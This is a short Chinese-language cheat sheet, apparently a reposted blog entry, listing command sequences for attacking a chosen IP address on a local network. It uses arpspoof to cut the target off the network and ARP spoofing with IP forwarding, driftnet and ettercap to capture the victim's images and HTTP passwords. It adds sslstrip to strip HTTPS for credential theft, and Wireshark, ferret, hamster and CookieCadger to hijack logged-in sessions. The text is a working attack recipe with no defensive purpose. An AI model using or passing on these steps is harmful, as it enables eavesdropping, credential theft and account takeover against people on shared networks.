1,指定IP地址斷網攻擊
arpspoof -i eth0 目標ip -t 網關
2,獲取指定ip所瀏覽的圖片
- echo 1 >/proc/sys/net/ipv4/ip_forward (進行ip流量轉發)
- driftnet -i本機ip -a(-a后臺執行)
3,獲取指定ip的http賬號密碼
- 開啟ip轉發echo 1 >/proc/sys/net/ipv4/ip_forward
- Arp欺騙arpspoof -i 本機ip -t 目標ip 網關
- Ettercap -Tq -i(本機ip)-t 文本模式 -q 安靜模式
4,獲取指定ip的https賬號密碼
- 編輯 vi /etc/ettercap/etter.conf
找到:#linux
去掉:#macos上方的二行 redir-command-on前的#
- sslstrip -a -f -k 把https轉為http
(3) 開啟ip轉發echo 1 >/proc/sys/net/ipv4/ip_forward
- Arp欺騙arpspoof -i 本機ip -t 目標ip 網關
- Ettercap -Tq -i(本機ip)-t 文本模式 -q 安靜模式
會話劫持,登陸指定IP登陸過的網站
(1)sslstrip -a -f -k 把https轉為http
(2)開啟ip轉發echo 1 >/proc/sys/net/ipv4/ip_forward
(3)Arp欺騙arpspoof -i 本機ip -t 目標ip 網關
(4)開啟抓包工具 wireshark 選擇eth0網卡 點擊start
(5)等待目標ip訪問,然后保存包為 .pcap格式
(6)ferrer -r 保存的.pcap檔案
(7)重放流量 hamster
(8)然后設定瀏覽器代理地址和埠
(9)最后打開127.0.0.1:1234里面找到頁面
注意:hamster需要在ferrer -r轉換后的檔案夾內執行
一鍵會話劫持
需要用到cookieCadger這個軟體
(1)sslstrip -a -f -k 把https轉為http
(2)開啟ip轉發echo 1 >/proc/sys/net/ipv4/ip_forward
(3)Arp欺騙arpspoof -i 本機ip -t 目標ip 網關
(4)java -jar cookieCadger-1.08.jar
(5)等待目標ip打開網頁
(6)最后尋找需要的頁面打開
備注:會話劫持有一定的失敗幾率,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/333586.html
標籤:其他
下一篇:滲透基礎知識